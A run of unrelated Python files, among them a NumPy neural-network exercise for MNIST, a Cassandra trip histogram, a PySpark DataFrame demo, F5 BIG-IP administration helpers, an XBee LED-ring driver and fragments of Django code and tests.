               n - batch size, ... - arbitrary input shape
        :return: np.array((n, ...)), same shape, with negatives clipped to 0
        """
        activated = inputs.copy()
        negative = activated < 0
        activated[negative] = 0
        return activated

    def backward(self, grad_outputs):
        """
        :param grad_outputs: np.array((n, ...)), dLoss/dOutputs,
               n - batch size, ... - arbitrary output shape
        :return: np.array((n, ...)), dLoss/dInputs (same shape)
        """
        # The derivative is 1 where the input was strictly positive, else 0.
        mask = np.zeros(grad_outputs.shape)
        mask[self.forward_inputs > 0] = 1
        return mask * grad_outputs
# ============================== 2.1.2 Softmax ===============================
class Softmax(Layer):
    """Row-wise softmax activation with a numerically stabilised exponential."""

    # Small constant guarding the normaliser against division by zero.
    EPS = 1e-15

    def forward(self, inputs):
        """
        :param inputs: np.array((n, d)), input values,
               n - batch size, d - number of units
        :return: np.array((n, d)), output values,
               n - batch size, d - number of units
        """
        # Subtracting any constant before exponentiating leaves the softmax
        # value unchanged; the global max is used here purely to avoid
        # overflow in np.exp. (`max` shadows the builtin — left as-is.)
        if inputs.size == 0:
            max = 0
        else:
            max = np.max(inputs)
        exps = np.exp(inputs - max)
        sums = np.expand_dims(np.sum(exps, axis=1), axis=1)
        return exps / (sums + self.EPS)

    def backward(self, grad_outputs):
        """
        :param grad_outputs: np.array((n, d)), dLoss/dOutputs,
               n - batch size, d - number of units
        :return: np.array((n, d)), dLoss/dInputs,
               n - batch size, d - number of units
        """
        outputs = self.forward_outputs
        batch_size = grad_outputs.shape[0]
        size = grad_outputs.shape[1]
        # Build the per-sample Jacobian J_ij = s_i * (delta_ij - s_j):
        # along_i broadcasts outputs down columns, along_j across rows.
        along_i = np.repeat(outputs[:, :, np.newaxis], size, axis=2)
        along_j = np.repeat(outputs[:, np.newaxis, :], size, axis=1)
        din_out = along_i * (np.repeat(np.eye(size)[np.newaxis, :, :], batch_size, axis=0) - along_j)
        # Batched matrix-vector product: dLoss/dInputs = J @ dLoss/dOutputs.
        return np.einsum('ijk,ik->ij', din_out, grad_outputs)
# =============================== 2.1.3 Dense ================================
class Dense(Layer):
    """Fully-connected layer: outputs = inputs @ weights + biases."""

    def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.output_shape = (units,)
        # Parameters are allocated lazily in build(), once the input shape is known.
        self.weights, self.weights_grad = None, None
        self.biases, self.biases_grad = None, None

    def build(self, *args, **kwargs):
        super().build(*args, **kwargs)
        input_units, = self.input_shape
        output_units, = self.output_shape
        # Register weights and biases as trainable parameters
        # Note, that the parameters and gradients *must* be stored in
        # self.<p> and self.<p>_grad, where <p> is the name specified in
        # self.add_parameter
        # He initialisation scales with fan-in, suiting ReLU activations.
        self.weights, self.weights_grad = self.add_parameter(
            name='weights',
            shape=(input_units, output_units),
            initializer=he_initializer(input_units)
        )
        self.biases, self.biases_grad = self.add_parameter(
            name='biases',
            shape=(output_units,),
            initializer=np.zeros
        )

    def forward(self, inputs):
        """
        :param inputs: np.array((n, d)), input values,
               n - batch size, d - number of input units
        :return: np.array((n, c)), output values,
               n - batch size, c - number of output units
        """
        batch_size, input_units = inputs.shape
        output_units, = self.output_shape
        # einsum('ij,jk->ik', ...) is a plain matrix multiply: X @ W + b.
        return np.einsum('ij,jk->ik', inputs, self.weights) + self.biases

    def backward(self, grad_outputs):
        """
        :param grad_outputs: np.array((n, c)), dLoss/dOutputs,
               n - batch size, c - number of output units
        :return: np.array((n, d)), dLoss/dInputs,
               n - batch size, d - number of input units
        """
        batch_size, output_units = grad_outputs.shape
        input_units, = self.input_shape
        inputs = self.forward_inputs
        # Don't forget to update current gradients:
        # dLoss/dWeights = X^T @ dLoss/dOutputs, averaged over the batch.
        self.weights_grad[...] = np.einsum('ij,ik->jk', self.forward_inputs, grad_outputs) / batch_size
        # dLoss/dBiases: mean of the output gradients over the batch.
        self.biases_grad[...] = np.mean(grad_outputs, axis=0)
        # dLoss/dInputs = dLoss/dOutputs @ W^T.
        return np.einsum('ij,kj->ki', self.weights, grad_outputs)
# ============================ 2.2.1 Crossentropy ============================
class CategoricalCrossentropy(Loss):
    """Categorical cross-entropy between one-hot targets and predicted probabilities."""

    # Keeps log()/division finite when a predicted probability is exactly zero.
    EPS = 1e-9

    def __call__(self, y_gt, y_pred):
        """
        :param y_gt: np.array((n, d)), ground truth (correct) labels
        :param y_pred: np.array((n, d)), estimated target values
        :return: np.array((n,)), loss scalars for batch
        """
        # loss_i = -sum_j y_ij * log(p_ij + EPS), computed row-wise.
        return -np.sum(y_gt * np.log(y_pred + self.EPS), axis=1)

    def gradient(self, y_gt, y_pred):
        """
        :param y_gt: np.array((n, d)), ground truth (correct) labels
        :param y_pred: np.array((n, d)), estimated target values
        :return: np.array((n, d)), gradient of the loss w.r.t. y_pred
        """
        return -y_gt / (y_pred + self.EPS)
# ================================ 2.3.1 SGD =================================
class SGD(Optimizer):
    """Plain stochastic gradient descent: p <- p - lr * dLoss/dp."""

    def __init__(self, lr):
        self._lr = lr

    def get_parameter_updater(self, parameter_shape):
        """
        :param parameter_shape: tuple, the shape of the associated parameter
        :return: the updater function for that parameter
        """
        def updater(parameter, parameter_grad):
            """
            :param parameter: np.array, current parameter values
            :param parameter_grad: np.array, current gradient, dLoss/dParam
            :return: np.array, new parameter values
            """
            # Both tensors must match the shape this updater was built for.
            assert parameter.shape == parameter_shape
            assert parameter_grad.shape == parameter_shape
            return parameter - self._lr * parameter_grad

        return updater
# ============================ 2.3.2 SGDMomentum =============================
class SGDMomentum(Optimizer):
    """SGD with classical momentum: v <- m*v + lr*grad; p <- p - v."""

    def __init__(self, lr, momentum=0.0):
        self._lr = lr
        self._momentum = momentum

    def get_parameter_updater(self, parameter_shape):
        """
        :param parameter_shape: tuple, the shape of the associated parameter
        :return: the updater function for that parameter
        """
        def updater(parameter, parameter_grad):
            """
            :param parameter: np.array, current parameter values
            :param parameter_grad: np.array, current gradient, dLoss/dParam
            :return: np.array, new parameter values
            """
            assert parameter_shape == parameter.shape
            assert parameter_shape == parameter_grad.shape
            assert parameter_shape == updater.inertia.shape
            # Don't forget to update the current inertia tensor:
            # the velocity lives as an attribute on the closure so every
            # parameter keeps its own state between update steps.
            updater.inertia[...] = updater.inertia * self._momentum + self._lr * parameter_grad
            return parameter - updater.inertia

        # Per-parameter velocity buffer, initialised to zeros.
        updater.inertia = np.zeros(parameter_shape)
        return updater
# ======================= 2.4 Train and test on MNIST ========================
def train_mnist_model(x_train, y_train, x_valid, y_valid):
    """Build, train and return a small MLP (784 -> 16 -> 10) MNIST classifier."""
    # 1) Create a Model
    loss = CategoricalCrossentropy()
    optimizer = SGDMomentum(lr=0.002, momentum=0.9)
    model = Model(loss, optimizer)
    # 2) Add layers to the model
    # (don't forget to specify the input shape for the first layer)
    model.add(Dense(units=16, input_shape=(784,)))
    model.add(ReLU())
    model.add(Dense(units=10))
    model.add(Softmax())
    # 3) Train and validate the model using the provided data
    # (batch size 16, 3 epochs).
    model.fit(x_train, y_train, 16, 3, x_valid=x_valid, y_valid=y_valid)
    return model
# ============================================================================
|
# coding=utf-8
r"""Apply edit operations from editt2t to the initial sentences."""
import argparse
import sys
# CLI: edit operations arrive on stdin; -t optionally supplies the initial
# sentences they are applied to.
parser = argparse.ArgumentParser(description='Read edit operations from stdin and apply them to sentences in trg_test.')
parser.add_argument('-t','--trg_test', help='Text file with initial sentences.', required=False)
args = parser.parse_args()
# Token id used as the end-of-sentence marker.
EOS_ID = 1
def ins_op(s, pos, token):
    """Return a new list equal to s with token inserted at index pos."""
    head, tail = s[:pos], s[pos:]
    return head + [token] + tail
def sub_op(s, pos, token):
    """Return a copy of s with the element at index pos replaced by token."""
    replaced = list(s)
    replaced[pos] = token
    return replaced
def del_op(s, pos):
    """Return a copy of s with the element at index pos removed."""
    before, after = s[:pos], s[pos + 1:]
    return before + after
def apply_ops(line_nr, line):
    """Decode integer-packed edit ops in `line` and apply them to sentence `line_nr`.

    Each op packs three fields: op // 100000000 is the type (1=insert,
    2=substitute, 3=delete), (op // 100000) % 1000 the position, and
    op % 100000 the token id. A trailing EOS_ID is stripped from the result.
    """
    # Start from the stored initial sentence if one was loaded, else just EOS.
    sentence = trg_sentences[line_nr] if trg_sentences is not None else [EOS_ID]
    for op in map(int, line.strip().split()):
        pos = (op // 100000) % 1000
        token = op % 100000
        op_type = op // 100000000
        if op_type == 1:  # Insertion
            sentence = ins_op(sentence, pos, token)
        elif op_type == 2:  # Substitution
            sentence = sub_op(sentence, pos, token)
        elif op_type == 3:  # Deletion
            sentence = del_op(sentence, pos)
        else:
            sys.exit("Illegal operation %d" % op)
    if sentence and sentence[-1] == EOS_ID:
        sentence = sentence[:-1]
    return " ".join(map(str, sentence))
trg_sentences = None
if args.trg_test:
    # Pre-load the initial sentences; each gets an explicit EOS marker so
    # positional edit operations can address the end of the sentence.
    trg_sentences = []
    with open(args.trg_test) as f:
        for line in f:
            # list(...) is required: on Python 3, `map` returns an iterator
            # and `iterator + [EOS_ID]` raises TypeError.
            trg_sentences.append(list(map(int, line.strip().split())) + [EOS_ID])
for line_nr, line in enumerate(sys.stdin):
    if "|" in line:  # n-best list format: "<id> | <score> | ... | <ops> | ..."
        parts = line.strip().split("|")
        parsed = apply_ops(int(parts[0].strip()), parts[3])
        print("|".join(parts[:3] + [" " + parsed + " "] + parts[4:]))
    else:  # plain format: one operation sequence per input line
        print(apply_ops(line_nr, line))
|
import matplotlib
matplotlib.use('Agg')  # headless backend: figures are only saved, never shown
from cassandra.cluster import Cluster
cluster = Cluster()
session = cluster.connect('e08')
import matplotlib.pyplot as plt
# Collect, per taxi, the number of trips recorded in September 2013.
taxi_ids = []
trip_counts = []
for taxi_row in session.execute("SELECT id FROM TAXI;"):
    count_query = "SELECT COUNT(tripid) as nb FROM TRIP3 WHERE year=2013 AND month=9 AND taxiid=" + str(taxi_row.id) + ";"
    taxi_ids.append(int(taxi_row.id))
    for count_row in session.execute(count_query):
        trip_counts.append(int(count_row.nb))
#************************************PLOT HISTOGRAMS******************************#
plt.clf()
plt.bar(taxi_ids, trip_counts)
plt.title("TRIPS BY TAXI")
plt.savefig('Figures/histogram_trip_by_taxi.png')
|
# Generated by Django 3.0.3 on 2020-02-16 11:01
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration: renames model Requests to RequestAPI."""

    dependencies = [
        ('core', '0010_auto_20200216_0850'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='Requests',
            new_name='RequestAPI',
        ),
    ]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from pyspark.sql.functions import udf
from pyspark.sql import SparkSession
from pyspark.sql.types import StringType, DoubleType
LOG = logging.getLogger(__name__)
def price_range(brand):
    """Map a handset brand to its price tier (used as a Spark UDF)."""
    tiers = {
        'Samsung': 'High Price',
        'Apple': 'High Price',
        'MI': 'Mid Price',
    }
    return tiers.get(brand, 'Low Price')
def main():
    """Demonstrate core PySpark DataFrame operations on /tmp/sample_data.csv."""
    spark = SparkSession.builder.appName('Data Processing').getOrCreate()
    df = spark.read.csv('/tmp/sample_data.csv', inferSchema=True, header=True)
    # Wrap the plain Python function as a Spark UDF returning a string column.
    brand_udf = udf(price_range, StringType())
    LOG.info("Columns: {0}".format(df.columns))
    LOG.info("Count: {0}".format(df.count()))
    # Check schema of dataframe.
    df.printSchema()
    # Read two columns using select method.
    df.select('age', 'mobile').show()
    # describe() for analyzing the dataframe (count/mean/stddev/min/max).
    df.describe().show()
    # Add a new column.
    df.withColumn('age_after_10_yrs', (df['age'] + 10)).show(10, False)
    # Add a new column and change the datatype of column.
    df.withColumn('age_double', df['age'].cast(DoubleType())).show(10, False)
    # Filtering data
    df.filter(df['mobile'] == 'Vivo').select('age', 'ratings', 'mobile').show()
    # Filtering data on two chained conditions.
    df.filter(df['mobile'] == 'Vivo').filter(df['experience'] > 10).show()
    # Distinct values in Column
    df.select('mobile').distinct().show()
    # Count of distinct values.
    LOG.info("Distinct values count: {0}".format(
        df.select('mobile').distinct().count()))
    # Group by
    df.groupBy('mobile').count().show(10, False)
    # Order by
    df.groupBy('mobile').count().orderBy('count', ascending=False).show(10,
                                                                        False)
    # Mean, Sum, Max and Min values per group.
    df.groupBy('mobile').mean().show(10, False)
    df.groupBy('mobile').sum().show(10, False)
    df.groupBy('mobile').max().show(10, False)
    df.groupBy('mobile').min().show(10, False)
    # Aggregations
    df.groupBy('mobile').agg({'experience': 'sum'}).show(10, False)
    # UDF
    df.withColumn('price_range', brand_udf(df['mobile'])).show(10, False)
    # lambda udf
    age_udf = udf(lambda age: "young" if age <= 30 else "senior", StringType())
    df.withColumn("age_group", age_udf(df['age'])).show(10, False)
if __name__ == '__main__':
    # Script entry point: configure root logging before running the demo.
    logging.basicConfig(level=logging.INFO)
    main()
|
from naya.json import parse, parse_string, stream_array

# Re-export naya's streaming-JSON helpers as this package's public API.
__all__ = ["parse", "parse_string", "stream_array"]
#!/usr/bin/python
# F5 functions used for JnJ F5 Network Automation
# Author: apined12@its.jnj.com
# Name: jnjf5tools
import sys
import time
import os
from base64 import b64decode
def vs_has_http(obj, vipname):
    '''
    Return True if an HTTP profile is applied to an F5 virtual server.
    obj = BIGIP connection instance
    vipname = virtual server name, e.g. VS-10.0.209.2-80
    '''
    vipname = '/Common/%s' % vipname
    try:
        profs = obj.LocalLB.VirtualServer.get_profile(virtual_servers=[vipname])
    except Exception as e:  # "except Exception, e" is Python-2-only syntax
        print(e)
        # Original referenced the unbound `profs` here and raised NameError;
        # report "no HTTP profile" on a failed API call instead.
        return False
    # Flatten the per-VS profile lists and look for an HTTP profile type.
    ptypes = [z['profile_type'] for x in profs for z in x]
    return 'PROFILE_TYPE_HTTP' in ptypes
def show_irule(obj, vipname):
    '''
    Return the iRules associated with a virtual server.
    obj = BIGIP connection instance
    vipname = virtual server name, e.g. VS-10.0.209.2-80
    Returns None (after printing the error) if the API call fails.
    '''
    try:
        rules = obj.LocalLB.VirtualServer.get_rule(virtual_servers=[vipname])
        return rules
    except Exception as e:  # modernised from Python-2-only "except Exception, e"
        print(e)
def create_irule(obj, viprule, vrule_content):
    '''
    Create a new iRule.
    obj = BIGIP connection instance
    viprule = Name of new iRule, e.g. Redirect_VS-10.0.209.6-80_v1.0
    vrule_content = Contents of new iRule stored in an external file; may be
    created using the standard iRule Jinja template
    '''
    try:
        obj.LocalLB.Rule.create(rules=[{'rule_name': viprule, 'rule_definition': vrule_content}])
        return None
    except Exception as e:  # modernised from Python-2-only "except Exception, e"
        print(e)
def mod_vip_irule(obj, vipname, curviprule, viprule):
    '''
    Replace an existing iRule on a virtual server with a new one.
    obj = BIGIP connection instance
    vipname = virtual server name, e.g. VS-10.0.209.2-80
    curviprule = name of the existing iRule that needs to be replaced
    viprule = name of the replacement iRule, e.g. Redirect_VS-10.0.209.6-80_v1.0
    '''
    lsrules = obj.LocalLB.VirtualServer.get_rule(virtual_servers=[vipname])
    for lrule in lsrules:
        for y in lrule:
            if y['rule_name'] != curviprule:
                continue
            # Remove the current rule set first ...
            try:
                obj.LocalLB.VirtualServer.remove_rule(virtual_servers=[vipname],
                                                      rules=lsrules)
            except Exception as e:  # modernised from "except Exception, e"
                print(e)
            # ... then re-add it with the matching entry renamed in place.
            y['rule_name'] = viprule
            try:
                obj.LocalLB.VirtualServer.add_rule(virtual_servers=[vipname],
                                                   rules=lsrules)
            except Exception as e:
                print(e)
    return None
def add_vip_irule(obj, vipname, viprule):
    '''
    Attach a new iRule to an existing virtual server.
    obj = BIGIP connection instance
    vipname = virtual server name, e.g. VS-10.0.209.2-80
    viprule = name of the iRule to attach, e.g. Redirect_VS-10.0.209.6-80_v1.0
    '''
    rules = obj.LocalLB.VirtualServer.get_rule(virtual_servers=[vipname])
    if rules != [[]]:
        # VS already has iRules: attach one priority above the current maximum.
        # (The original kept a `count` index that was only ever 0 here.)
        check_priority = [rule['priority'] for rule in rules[0]]
        try:
            obj.LocalLB.VirtualServer.add_rule(
                virtual_servers=[vipname],
                rules=[[{'rule_name': viprule, 'priority': (max(check_priority) + 1)}]])
        except Exception as e:  # modernised from Python-2-only "except Exception, e"
            print(e)
    else:
        # First iRule on this VS gets priority 0.
        try:
            obj.LocalLB.VirtualServer.add_rule(
                virtual_servers=[vipname],
                rules=[[{'rule_name': viprule, 'priority': 0}]])
        except Exception as e:
            print(e)
    return None
def modify_pool(obj, plname, plmem, plminmem):
    '''
    Add/remove pool members of an existing pool based on each member's 'mode'.
    obj = BIGIP connection instance
    plname = pool name
    plmem = list of pool member dicts (address, port, mode, priority)
    plminmem = minimum active members per priority group (0 = leave unset)
    '''
    pool = '/Common/%s' % plname
    pmadd = []
    pmdel = []
    prio = []
    # Split members into add/remove sets; collect priorities for all members.
    for m in plmem:
        pm = {}
        pm['address'] = '/Common/%s' % m['address']
        pm['port'] = m['port']
        if m['mode'] == "add":
            pmadd.append(pm)
        else:
            pmdel.append(pm)
        # NOTE(review): priorities are collected for every member but applied
        # only to pmadd below -- lengths can diverge when deletes are present;
        # preserved from the original, verify against callers.
        prio.append(m['priority'])
    try:
        getpools = obj.LocalLB.Pool.get_list()
        if pool in getpools and pmadd != []:
            obj.LocalLB.Pool.add_member_v2(pool_names=[pool], members=[pmadd])
        if pool in getpools and pmdel != []:
            obj.LocalLB.Pool.remove_member_v2(pool_names=[pool], members=[pmdel])
        if plminmem != 0:
            obj.LocalLB.Pool.set_minimum_active_member(pool_names=[pool], values=[plminmem])
        obj.LocalLB.Pool.set_member_priority(pool_names=[pool], members=[pmadd], priorities=[prio])
        return None
    except Exception as e:  # modernised from Python-2-only "except Exception, e"
        print(e)
def generate_csr(obj, c_email, c_cn, c_ctry, c_st, c_loc, c_org, c_ou, c_san, ver):
    '''
    Generate a 2048-bit RSA key and a certificate signing request on the F5.
    SAN extensions are only supported by the v12 API; older versions fall back
    to the plain CSR call. Returns the on-device path of the exported CSR.
    '''
    subject = {}
    subject['common_name'] = c_cn
    subject['country_name'] = c_ctry
    subject['state_name'] = c_st
    subject['locality_name'] = c_loc
    subject['organization_name'] = c_org
    subject['division_name'] = c_ou
    # Generate the key only; the CSR is created separately below so the
    # email address can be supplied in that API call.
    try:
        obj.Management.KeyCertificate.key_generate_v2(mode='MANAGEMENT_MODE_DEFAULT',
            keys=[{'id': c_cn, 'key_type': 'KTYPE_RSA_PUBLIC', 'bit_length': 2048,
                   'security': 'STYPE_NORMAL', 'curve_name': 'ELLIPTIC_CURVE_NONE'}],
            x509_data=[subject], create_optional_cert_csr=False, overwrite=False)
    except Exception as e:  # modernised from Python-2-only "except Exception, e"
        print(e)
    # Generate the CSR (with SAN extensions when supported and requested).
    try:
        if 'v12' in ver and c_san != []:
            obj.Management.KeyCertificate.certificate_request_generate_with_extensions(
                mode='MANAGEMENT_MODE_DEFAULT',
                csrs=[{'id': c_cn, 'email': c_email, 'challenge_password': None}],
                x509_data=[subject],
                extensions=[c_san], overwrite=False)
        elif 'v10' in ver or 'v11' in ver or ('v12' in ver and c_san == []):
            obj.Management.KeyCertificate.certificate_request_generate(mode='MANAGEMENT_MODE_DEFAULT',
                csrs=[{'id': c_cn, 'email': c_email, 'challenge_password': None}],
                x509_data=[subject], overwrite=False)
    except Exception as e:
        print(e)
    # Export the CSR to /shared/tmp on the device for later retrieval.
    try:
        obj.Management.KeyCertificate.certificate_request_export_to_file(mode='MANAGEMENT_MODE_DEFAULT',
            csr_ids=[c_cn], file_names=['/shared/tmp/' + c_cn + '.csr'], overwrite=False)
    except Exception as e:
        print(e)
    csr_location = '/shared/tmp/' + c_cn + '.csr'
    return csr_location
def config_sync(obj):
    '''
    Synchronize configuration between a redundant pair of F5 devices.
    Runs only on a redundant pair and only from the active unit; any
    synchronization failure is silently ignored (preserved behavior).
    '''
    rd = obj.System.Failover.is_redundant()
    if rd:
        fs = obj.System.Failover.get_failover_state()
    else:
        return None
    if fs == "FAILOVER_STATE_ACTIVE":
        dl = obj.Management.DeviceGroup.get_list()
        dt = obj.Management.DeviceGroup.get_type(device_groups=dl)
        # Find the failover-type device group and sync to it from this device.
        for x in zip(dl, dt):
            if x[1] == "DGT_FAILOVER":
                device_grp = x[0]
        local_dev = obj.Management.Device.get_local_device()
        try:
            obj.System.ConfigSync.synchronize_to_group_v2(group=device_grp,
                                                          device=local_dev, force=True)
        except Exception:  # modernised from Python-2-only "except Exception, e"
            return None
def save_config(obj, savefile, saveflag):
    '''
    Save the current configuration changes on the F5. The supplied filename
    is ignored by the device when save_flag is SAVE_HIGH_LEVEL_CONFIG --
    see the F5 API reference for detail.
    '''
    try:
        obj.System.ConfigSync.save_configuration(filename=savefile, save_flag=saveflag)
        return None
    except Exception as e:  # modernised from Python-2-only "except Exception, e"
        print(e)
def file_download(obj, src_file, dst_file, chunk_size, buff=1048576):
    '''
    Download a file from the F5 to the local host in chunks.
    obj = BIGIP connection instance
    src_file = path of the file on the F5
    dst_file = destination path on the local host
    chunk_size = bytes requested per API call
    buff (optional) = file write buffer size; default is 1MB
    Returns the (approximate) number of payload bytes written.
    '''
    foffset = 0
    timeout_error = 0
    fbytes = 0
    # Write to a temp file and rename on success so a partial download never
    # masquerades as a complete one. Opened 'wb' because the payload is
    # base64-decoded binary -- text mode breaks under Python 3.
    f_dst = open(dst_file + '.tmp', 'wb', buff)
    while True:
        try:
            chunk = obj.System.ConfigSync.download_file(file_name=src_file,
                                                        chunk_size=chunk_size,
                                                        file_offset=foffset)
        except Exception:  # narrowed from bare except: let KeyboardInterrupt through
            timeout_error += 1
            if timeout_error >= 3:
                # Third consecutive failure: clean up the temp file and re-raise.
                f_dst.close()
                os.remove(dst_file + '.tmp')
                raise
            time.sleep(2)  # brief backoff before retrying
            continue
        # Reset the failure counter after a successful call.
        timeout_error = 0
        # Decode and append this chunk's payload.
        fchunk = b64decode(chunk['return']['file_data'])
        f_dst.write(fchunk)
        fbytes += sys.getsizeof(fchunk) - 40  # rough payload-byte accounting
        # FILE_FIRST_AND_LAST / FILE_LAST mark the end of the transfer.
        fprogress = chunk['return']['chain_type']
        if fprogress in ('FILE_FIRST_AND_LAST', 'FILE_LAST'):
            f_dst.close()
            os.rename(dst_file + '.tmp', dst_file)
            return fbytes
        # Advance to the offset of the next chunk.
        foffset = chunk['file_offset']
|
import binascii
import string
import itertools
import threading
import sys
import traceback
import struct
from xbee import ZigBee
class Timeout(Exception):
    """Raised when a Waiter thread gives up after its timeout elapses."""
    def __init__(self, msg):
        self.msg = msg
class TransmitError(Exception):
    """Raised when the radio reports a non-zero delivery status for a frame."""
    def __init__(self, msg):
        self.msg = msg
class FrameConsumer():
    """Fan-out hub: receives every XBee frame and forwards it to observers.

    NOTE: this module is Python 2 code (print statements below).
    """
    def __init__(self):
        self._observers = []

    def attach(self, observer):
        # Register an observer once; duplicates are ignored.
        if not observer in self._observers:
            self._observers.append(observer)

    def detach(self, observer):
        # Detaching an observer that was never attached is a no-op.
        try:
            self._observers.remove(observer)
        except ValueError:
            pass

    #noinspection PyBroadException
    def receive_frame(self, frame):
        # Dump the raw frame fields (hex-encoded) for debugging.
        print "## received frame: "
        for x in frame:
            print "## " + '{0: <16}'.format(x) + ": " + binascii.hexlify(frame[x])
        # Forward to every observer; a faulty observer must not break the rest,
        # so exceptions are logged and swallowed.
        for observer in self._observers:
            try:
                observer.receive_frame(frame)
            except:
                print "swallowed exception"
                exc_type, exc_value, exc_traceback = sys.exc_info()
                print repr(traceback.format_exception(exc_type, exc_value,
                                                      exc_traceback))
class Waiter(threading.Thread):
    """Thread that blocks until a subclass flags a matching frame or a timeout fires."""
    def __init__(self, observable, timeout):
        threading.Thread.__init__(self)
        self.timeout = timeout          # seconds to wait before giving up
        self.result = None              # "OK"/"ERR", set by subclass or timeout
        self.exception = None           # populated on timeout / transmit error
        self.observable = observable
        self.observable.attach(self)    # start receiving frames immediately
        self.done = threading.Event()   # set by subclasses when a match is seen

    def detach(self):
        self.observable.detach(self)

    def run(self):
        # Wait for a subclass to flag completion; on timeout record the error.
        if not self.done.wait(self.timeout):
            self.result = "ERR"
            self.exception = Timeout("Thread was waiting for " + str(self.timeout))
        # Detach in all cases; detach() tolerates an already-removed observer.
        self.detach()
class WaitForResponse(Waiter):
    """Waits for the TX status frame that matches a given frame_id."""
    def __init__(self, observable, timeout, frame_id):
        Waiter.__init__(self, observable, timeout)
        self.frame_id = frame_id
        self.response = None  # the matching status frame, once received

    def receive_frame(self, frame):
        # frame_id is stored as a single byte in the frame dict.
        if "frame_id" in frame and frame["frame_id"] == chr(self.frame_id):
            self.done.set()
            print "found response"
            # deliver_status 0x00 means the radio confirmed delivery.
            if frame["deliver_status"] == b'\x00':
                self.result = "OK"
            else:
                self.result = "ERR"
                self.exception = TransmitError(
                    "Received Deliver Status: " + binascii.hexlify(frame["deliver_status"]) + " for frame " + str(
                        self.frame_id))
            self.response = frame
            self.detach()
class WaitForConfirm(Waiter):
    """Waits for an application-level RF frame whose payload matches exactly."""
    def __init__(self, observable, timeout, expected_data):
        Waiter.__init__(self, observable, timeout)
        self.expected_data = expected_data  # exact rf_data payload to look for
        self.confirm = None                 # the matching frame, once received

    def receive_frame(self, frame):
        if "rf_data" in frame and frame["rf_data"] == self.expected_data:
            self.done.set()
            print "found confirm"
            self.result = "OK"
            self.confirm = frame
            self.detach()
class LedRing():
    """Driver for a 16-LED ring controlled over an XBee/ZigBee radio link.

    Each command is a one-byte opcode (COMMANDS) optionally followed by a
    payload. The remote node answers with RECEIVED_COMMAND + opcode, which
    _tx waits for in addition to the radio's own TX status frame.
    NOTE: Python 2 code (print statements, iterator .next()).
    """
    # Opcode table understood by the remote LED-ring firmware.
    COMMANDS = {
        "full": b'\x00',
        "color": b'\x01',
        "pos": b'\x02',
        "jump": b'\x03',
        "level": b'\x04',
        "level_red": b'\x05',
        "level_green": b'\x06',
        "level_blue": b'\x07',
        "red": b'\x08',
        "green": b'\x09',
        "blue": b'\x0a',
        "rot_left": b'\x0b',
        "rot_right": b'\x0c',
        "rot_off": b'\x0d',
        "set_fade": b'\x0e',
        "fade_off": b'\x0f',
        "brightness": b'\x10',
        "use_gamma": b'\x11',
        "gamma_off": b'\x12',
    }
    REQUEST = b'\x01'
    RECEIVED_COMMAND = b'\x02'  # prefix of the remote node's confirmation payload

    def __init__(self, serial, addr, addr_long):
        self.frame_consumer = FrameConsumer()
        self.xbee = ZigBee(serial, callback=self.frame_consumer.receive_frame, escaped=True)
        self.addr = addr
        self.addr_long = addr_long
        # Frame ids cycle 1..254; id 0 would disable TX status responses.
        self.frame_cycle = itertools.cycle(range(1, 255))

    def _tx(self, command, data=None):
        # Send opcode (+ optional payload), then block until both the radio's
        # TX status and the application-level confirmation arrive or time out.
        cmd = self.COMMANDS[command]
        if not data is None:
            cmd = cmd + data
        frame_id = self.frame_cycle.next()
        print "## sending " + binascii.hexlify(cmd) + " len: " + str(len(cmd)) + " to node " + binascii.hexlify(
            self.addr_long)
        # Start the waiters BEFORE transmitting so no response can be missed.
        wait_response = WaitForResponse(self.frame_consumer, 60, frame_id)
        wait_confirm = WaitForConfirm(self.frame_consumer, 60, self.RECEIVED_COMMAND + self.COMMANDS[command])
        wait_confirm.start()
        wait_response.start()
        self.xbee.tx(
            frame_id=chr(frame_id),
            dest_addr_long=self.addr_long,
            dest_addr=self.addr,
            data=cmd
        )
        wait_response.join(60)
        print "response " + str(wait_response.result)
        if wait_response.exception:
            raise wait_response.exception
        wait_confirm.join(60)
        print "confirm " + str(wait_confirm.result)
        if wait_confirm.exception:
            raise wait_confirm.exception

    # --- thin command wrappers: one method per opcode -----------------------
    def rotate_counter_clockwise(self):
        self._tx("rot_right")

    def rotate_clockwise(self):
        self._tx("rot_left")

    def rotate_off(self):
        self._tx("rot_off")

    def set_red(self):
        self._tx("red")

    def set_green(self):
        self._tx("green")

    def set_blue(self):
        self._tx("blue")

    def set_level_red(self, level):
        self._tx("level_red", chr(level))

    def set_level_green(self, level):
        self._tx("level_green", chr(level))

    def set_level_blue(self, level):
        self._tx("level_blue", chr(level))

    def set_level_color(self, color, level):
        # Payload: level byte followed by the hex-encoded color selector.
        self._tx("level", binascii.unhexlify(binascii.hexlify(chr(level)) + color))

    def set_color(self, r, g, b):
        self._tx("color", chr(r) + chr(g) + chr(b))

    def set_position(self, pos):
        self._tx("pos", chr(pos))

    def set_jump(self, jump):
        self._tx("jump", chr(jump))

    def set_colors(self, colors):
        # One hex color string per LED; the ring has exactly 16 LEDs.
        if len(colors) == 16:
            self._tx("full", binascii.unhexlify(string.join(colors, "")))
        else:
            print "length should be 16"

    def fade_off(self):
        self._tx("fade_off")

    def set_fade(self, fades):
        # 16 fade periods packed as big-endian unsigned shorts.
        if len(fades) == 16:
            self._tx("set_fade", struct.pack('>16H', *fades))
        else:
            print "length should be 16"

    def use_gamma(self):
        self._tx("use_gamma")

    def gamma_off(self):
        self._tx("gamma_off")

    def set_brightness(self, brightness):
        self._tx("brightness", chr(brightness))
import os
import pytest
from django.core.files.base import ContentFile
from django.db import transaction
from bpp.models import Autor_Dyscyplina, Dyscyplina_Naukowa
from import_dyscyplin.models import (
Import_Dyscyplin,
Import_Dyscyplin_Row,
Kolumna,
guess_rodzaj,
)
def test_guess_rodzaj():
    """guess_rodzaj maps known header names to column kinds; unknown ones to POMIJAJ (skip)."""
    assert guess_rodzaj("nazwisko") == Kolumna.RODZAJ.NAZWISKO
    assert guess_rodzaj("kopara") == Kolumna.RODZAJ.POMIJAJ
    assert guess_rodzaj("lp") == Kolumna.RODZAJ.POMIJAJ
def test_Import_Dyscyplin_post_delete_handler(
    test1_xlsx, normal_django_user, transactional_db
):
    """Deleting an Import_Dyscyplin must also remove its uploaded file from disk."""
    path = None
    with transaction.atomic():
        i = Import_Dyscyplin.objects.create(
            owner=normal_django_user,
        )
